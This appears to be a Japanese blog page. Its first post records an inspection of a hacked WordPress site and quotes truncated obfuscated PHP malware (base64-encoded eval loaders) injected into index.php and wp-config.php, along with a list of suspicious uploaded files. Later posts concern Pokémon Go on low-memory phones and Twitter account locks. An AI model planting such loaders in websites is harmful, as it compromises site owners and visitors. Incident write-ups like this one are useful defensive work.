クラックされたwordpressを見てみた

ページが開けない、というので、調べてみたら、クラックされたwordpressだったので、いろいろファイルをのぞいてみた記録

ざらっと調べてみたけど、被害範囲がでかすぎたので、最初から作ってもらうしかないです、という回答となりました。

・index.php に下記のような文字列が埋め込まれていた

$GLOBALS['_502176623_']=Array(base64_decode('ZXJyb3Jf' .'cm' .'V' .'wb3' .'J0aW5' .'n'),base64_decode('cHJlZ' .'19tYXRj' .'aA=' .'='),base64_decode('cHJlZ19' .'y' .'Z' .'XBsYW' .'Nl'),base64_decode('c3' .'RycG9' .'z'),base64_decode('' .'bWQ1'),base64_decode('ZnVuY' .'3Rp' .'b25fZXhpc3Rz'),base64_decode('Y3' .'Vy' .'bF9pbml' .'0'),base64_decode('Y' .'3Vyb' .'F9zZ' .'XRvcH' .'Q='),base64_decode('Y' .'3Vyb' .'F9zZXRv' .'cHQ='),base64_decode('Y' .'3V' .'yb' .'F9zZX' .'R' .'vcHQ'
<略>
+50)){echo $_8;}}elseif(@$GLOBALS['_502176623_'][13](_1644837808(1091))== round(0+0.25+0.25+0.25+0.25)){echo@$GLOBALS['_502176623_'][14]($_6);}}
//###==###

・wp-config.php 下記のようなものが数箇所に埋め込まれていた

eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJGF1YnRvcSA9IDE2MDU7IGZ1bmN0aW9uIHh1Y3dxbXIoJHRidmRoLCAka29pbW5nbHcpeyRuanpuZXhxcSA9ICcnOyB
<略>
neCc9PidDJywgJ3onPT4nMCcpOwpldmFsLypkeXNwZiovKHh1Y3dxbXIoJGp5Z3h0c2IsICRxemlmeGY
pKTsKfQ=="));

・wp-content/uploads/ にいろんなものがアップロードされている

[root@host wp-content]# ls -la uploads/
合計 56
drwxr-xr-x  5 apache apache  4096 12月  3 11:45 2016 .
drwxr-xr-x  7 apache apache  4096 11月  7 12:50 2016 ..
-rw-r--r--  1 apache apache     0  5月  2 09:41 2016 1.php
drwxr-xr-x  4 apache apache  4096 10月 10 22:31 2016 2015
drwxr-xr-x 12 apache apache  4096 10月  1 01:17 2016 2016
-rw-r--r--  1 apache apache 21377  5月  2 09:41 2016 dbc.php.suspected
-rw-r--r--  1 apache apache  1367 11月  7 12:50 2016 jpgjsk.php.suspected
-rw-r--r--  1 apache apache  4902  5月  2 09:41 2016 mates.php.suspected
drwxr-xr-x  2 apache apache  4096 12月 13 23:58 2016 ps_auto_sitemap
[root@host wp-content]#

・wp-admin/.bt と wp-admin/css/.bt というファイルが作成され、おそらくアクセス許可IPが記載されている
ファイル末尾に追記されるわけではなく、ソートされた順序で増えていっていた

0.5.2.2
0.83.4.1
100.2.201.8
100.35.50.239
100.43.80.14
<略>
99.98.120.94
99.98.2.226
#version:1

・いろんなphpの冒頭が下記のように書き換えられている

<?php





                                      $h00d = 846;$GLOBALS['a287']=Array();globa
l$a287;<略>
$a287['h6d2'][65]]);}exit();} ?><?php
/**

・あと、データベースにいろいろデータが突っ込まれていた

メモリ1GBのAcer Liquid Z330でポケモンGoが出来た

丁度発注していたAcer Liquid Z330でポケモンGoが動くか確認してみた・・・

RAM 1GBの機種だけど動くかなぁ?と思っていましたが
ARは無理でしたが、それ以外は問題無く動作しました!

・・・おや?
楽天モバイル取り扱い端末における「Pokémon GO」の動作検証状況について

Liquid Z330 × 非対応

「非対応」って、どういう意味だろ?
公式にはRAM 2GB以上とあるせいかな?(Z330はRAM 1GB)


2016/07/26追記

Z330で「GPSを探しています」というメッセージのままプレイできない、という話があるようです。
が・・・うちでは、そんなことなく遊べています。
動かない人はFirmwareが古いんじゃないですかねぇ

メモリ1GBのCovia FLEAZ F4でポケモンGoが出来た

Covia FLEAZ F4に、ポケモンGoがインストールし、ARが動かない以外は、重いという問題はあるものの、プレイすることができました。

ただ、マーケットアプリで「ポケモンGo」と検索してもでてこず「Pokemon go」と英語で検索したら出てきた、というところが変わった点でしょうか。
ちなみに開発会社の「niantic」で検索しても出てこなかったのは謎です。
Ingressのページから、他のアイテムに表示されてはいるのですけどね・・・

ポケモンGoのGoogle Playストアのリンク「https://play.google.com/store/apps/details?id=com.nianticlabs.pokemongo

初期化状態からインストールする場合の注意点
・初期のPlayストア(ver4.xx)ではインストールできない
 一回Playストアを使ってからしばらく放置しているとアップデートされるのを待つ必要がある
・Google開発者サービスのアップデートも必要とする
 意図的にアップデート画面を出すのが面倒なので、GmailアプリやGoogleマップアプリをインストールし
 アプリを起動しようとすると、開発者サービスの更新を要求されるので
 そこから更新を行うのが簡単でしょう

twitterで新規登録したアカウントが15分でロックされる

twitterで自分の発言が検索に出てこない、再び」という状況となり、改善の見込みもないため、twitterアカウントを新しく作成しました。

自メールサーバに新メールアドレスを作成し、twitterアカウントを作成。
登録完了後、メール通知は不要なので、設定変更を実施中にいきなり
003
という画面が・・・

アカウントの凍結またはロックに異議を申し立てる」から、「設定してるだけでロックされるってどういうことだ(要約)」とクレームを入れる。

すぐに下記の自動返信メールが届く

いつもご利用いただきありがとうございます。

あなたのアカウントがTwitterルール (リンク先を参照してください) に違反する自動化動作を行ったと判断されたようです。https://support.twitter.com/articles/18311

これからもTwitterを安全にご利用いただくために、次の手順に従ってください。

ウェブサイトでアカウントにログインするか、Twitterアプリ (iOSアプリまたはAndroid) を開くアカウントがロックされていることを知らせるメッセージが表示される。[スタート] をクリックまたはタップドロップダウンメニューで国または地域を選択した後、電話番号を入力[コードを送信] をクリックすると、確認コードが記載されたテキストメッセージがTwitterから送信される (メッセージ受信の標準料金が発生する可能性があります)受け取ったコードを [コード] ボックスに入力して、[送信] をクリックアカウントのロックが解除されたという確認メッセージが表示される

本人確認が完了しても、アカウントのロックが解除されるまで数分かかる場合があります。

本人確認が完了しても問題が解決しない場合は、このメールへ返信する形で問題の詳細をお知らせください。最善を尽くしてサポートいたします。

よろしくお願いいたします。

Twitter サポートチーム

なので、このメールに対する返信として「設定してるだけで、発言もしてないのに、自動化ルールに違反って、どういう意味ですか?」と送信。

その結果・・・

ご連絡ありがとうございます。

お客様のアカウントでTwitterで禁止されている自動化された行為を検出しました。
Twitterルール: https://support.twitter.com/articles/18311

Twitterには、複数の自動スパムアカウントを一括して排除するシステムがあります。残念ながら、お客様のアカウントは誤ってスパムと判断されてしまったようです。
只今アカウントの凍結を解除いたしました。ご迷惑をおかけして申し訳ございませんでした。

このメールにご返信いただいても対応いたしかねますので、ご了承ください。

よろしくお願いいたします。

Twitter サポートチーム
http://support.twitter.com
@TwitterHelpJP

ということで、ロックは解除されました。

で・・・気になるのは、コレはホントに誤検出なのか?というところ。
別のIPアドレス、別のサーバのメールアドレスなどを使い、3つのtwitterアカウントを作成してみました。
1つは、osakanataro1 とアカウント名は似たようなものにし、設定だけ行ってログアウト。
1つは、アカウント名の法則をosakanataroとは全く関係ないものにして、設定だけ行ってログアウト。
1つは、アカウント名の法則を似たようなものにして、1度ログインだけして、何もせずログアウト。

・・・・・・・1時間経過

どれもロックされてるってどういうことですかね!!!!!
同じようにロックに対して異議申し立てを実施したところ、まったく同じように対応され、ロック解除されました。
(1つは、申し立てしてないので、いまも凍結状態・・・)

どうやら、twitter社の自動化検出プロセスには、かなりアホな模様です。

twitterで自分の発言が検索に出てこない、再び

2010年に「twitterで自分の発言が検索に出てこない」という事象が起きていました。
その際は、twitterのメールアドレスをみつけて、なんとかねじ込んだ結果、ようやく現象が解決となりました。

が・・・2016年5月、また、この状況になり、現在も、解決していません。
twitter社に無視され続けています。

2016年5月17日、朝起きると、twitterアカウントがロックされていました。
001

もちろん思い当たる節など、全くない

仕方が無いので、SMS登録をしたところ、解除はされ、ログインと発言ができるようになった。
設定を確認し、ログイン履歴を確認したが、怪しげなものはない。

で・・・1日ぐらいたってから気がつく。

どうやら「@ユーザ名 発言」と誰かに話しかけても、先方に認知されない。

もしや、と思い、twitter検索で「from:osakanataro」と、osakanataroによる発言内容を検索してみる。
自分のアカウントでは、結果が表示される。

しかし、別のアカウントでログインし、「from:osakanataro」と検索すると、何も表示されない。
002

「@ユーザ名 発言」とした場合に、ユーザの通知欄に、なにも表示されないという状況も確認。

で・・・、現在の問い合わせ先を探してみる
チケットを作成」というのがソレらしい。

通知の問題の報告」と「検索の問題の報告」が該当しそうなので、それぞれ報告してみる。

で・・・返事は全くない。
1ヶ月の間に、何回か送ってみたが、1度もない。
また、自分のアカウントから送ったら無視されるのか、と考え、他の人に問い合わせを依頼しても、同じく回答がない、とのこと。

こんな状況におとしいれてるにも関わらず、twitterからは、広告の売り込みがほぼ毎日くる。
今日も来ている。
なので、twitter広告の問い合わせ先に、「twitterにより検索に出ないようにされてるんだけど、そんな状態で広告の効果あるの」と問い合わせて見たところ、回答の拒否を表明。
さらに突っ込んで聞いて見たところ、無反応となりました。

いったい、何が原因だったのかも分からず、ひどい状況です。

どうしようもないので、アカウントを新規で作成しました。
@osakanataro2

で・・・このアカウントを作成した時にも、また別のヒドイ話がありました。
これについては「twitterで新規登録したアカウントが15分でロックされる」にて・・・